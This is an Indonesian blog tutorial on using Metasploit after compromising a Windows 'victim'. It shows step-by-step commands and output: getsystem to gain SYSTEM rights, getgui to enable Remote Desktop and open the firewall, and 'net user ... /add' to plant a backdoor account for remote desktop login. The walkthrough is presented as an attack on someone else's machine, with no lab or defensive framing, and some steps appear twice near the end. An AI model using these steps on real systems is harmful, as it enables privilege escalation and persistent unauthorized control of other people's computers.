kali ini masih seputar metasploit. Yaitu lanjutan setelah kita
mendapatkan meterpreter session di victim. Kita bisa menggunakan fitur
getgui nya msf untuk menambahkan user dan mengontrol desktop korban .
Pertama, kita pastikan dulu kita telah mendapat hak akses system di victim, bukan user biasa.meterpreter > getuid
Server username: WIN-IA0JPLFHM2G\Uzumaki
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Lalu masukkan command untuk menambahkan username dan password :
run getgui -u <username> -p <password>
tapi disini saya mengalami error ketika menambahkan user dan password dengan metode tersebut.
meterpreter > run getgui -u nagisa -p linuxsec
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[-] Unexpected windows error 1332
[-] Error in script: NoMethodError undefined method `[]' for nil:NilClass
Kita pakai cara lain.
Pertama, kita enable remote desktop nya dengan getgui.
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
Selanjutnya masuk ke cmd shell.
meterpreter > shell
Process 332 created.
Channel 4 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Lalu tambahkan user dan password dengan command :
net user <username> <password> /add
C:\Windows\system32>net user nagisa linuxsec /add
net user nagisa linuxsec /add
The command completed successfully.
C:\Windows\system32>
Sekarang kembali ke meterpreter shell.
Lalu masukkan command ipconfig untuk mengetahui ip korban.
Langkh terakhir adalah mengakses desktop victim dengan user dan password serta ip yang sudah kita atur.
Silahkan gunakn remote desktop client kesukaan kalian, bisa rdesktop, remmina, dll.
Sekian tutorial kali ini, semoga bermanfaat. Share juga ke teman teman mu biar mereka tau.
C:\Users\Uzumaki\Desktop>^C
Terminate channel 5? [y/N] y
meterpreter >
Lalu masukkan command ipconfig untuk mengetahui ip korban.
meterpreter > ipconfig
Langkh terakhir adalah mengakses desktop victim dengan user dan password serta ip yang sudah kita atur.
Silahkan gunakn remote desktop client kesukaan kalian, bisa rdesktop, remmina, dll.
Dapatkan Tips Menarik Setiap Harinya!
- Dapatkan tips dan trik yang belum pernah kamu tau sebelumnya
- Jadilah orang pertama yang mengetahui hal-hal baru di dunia teknologi
- Dapatkan Ebook Gratis: Cara Dapat 200 Juta / bulan dari AdSense
0 Response to " Mendapatkan Akses Remote Desktop Dengan Metasploit"
Post a Comment
Catatan Untuk Para Jejaker